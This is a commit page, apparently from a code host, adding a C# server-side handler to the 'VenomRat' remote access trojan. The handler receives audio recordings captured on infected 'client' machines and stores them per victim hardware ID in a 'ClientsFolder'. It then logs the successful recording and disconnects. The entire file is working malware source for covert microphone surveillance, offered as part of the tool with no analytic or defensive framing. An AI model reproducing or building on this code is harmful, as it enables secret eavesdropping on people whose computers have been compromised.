VenomRat
This commit is contained in:
46
Handle_Packet/HandleAudio.cs
Normal file
46
Handle_Packet/HandleAudio.cs
Normal file
@@ -0,0 +1,46 @@
|
||||
using System;
|
||||
using System.Drawing;
|
||||
using System.IO;
|
||||
using System.Threading.Tasks;
|
||||
using System.Windows.Forms;
|
||||
using MessagePackLib.MessagePack;
|
||||
using Server.Connection;
|
||||
using Server.Forms;
|
||||
|
||||
namespace Server.Handle_Packet;
|
||||
|
||||
public class HandleAudio
|
||||
{
|
||||
public async void SaveAudio(Clients client, MsgPack unpack_msgpack)
|
||||
{
|
||||
try
|
||||
{
|
||||
FormAudio formAudio = (FormAudio)Application.OpenForms["Audio Recorder:" + unpack_msgpack.ForcePathObject("Hwid").GetAsString()];
|
||||
if (unpack_msgpack.ForcePathObject("Close").GetAsString() == "true")
|
||||
{
|
||||
formAudio.btnStartStopRecord.Text = "Start Recording";
|
||||
formAudio.btnStartStopRecord.Enabled = true;
|
||||
client.Disconnected();
|
||||
return;
|
||||
}
|
||||
formAudio.btnStartStopRecord.Text = "Start Recording";
|
||||
formAudio.btnStartStopRecord.Enabled = true;
|
||||
string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder", unpack_msgpack.ForcePathObject("Hwid").AsString, "SaveAudio");
|
||||
if (!Directory.Exists(fullPath))
|
||||
{
|
||||
Directory.CreateDirectory(fullPath);
|
||||
}
|
||||
await Task.Run(delegate
|
||||
{
|
||||
byte[] asBytes = unpack_msgpack.ForcePathObject("WavFile").GetAsBytes();
|
||||
File.WriteAllBytes(fullPath + "//" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".wav", asBytes);
|
||||
});
|
||||
new HandleLogs().Addmsg("Client " + client.Ip + " recording success,file located @ ClientsFolder/" + unpack_msgpack.ForcePathObject("Hwid").AsString + "/SaveAudio", Color.Purple);
|
||||
client.Disconnected();
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
new HandleLogs().Addmsg("Save recorded file fail " + ex.Message, Color.Red);
|
||||
}
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user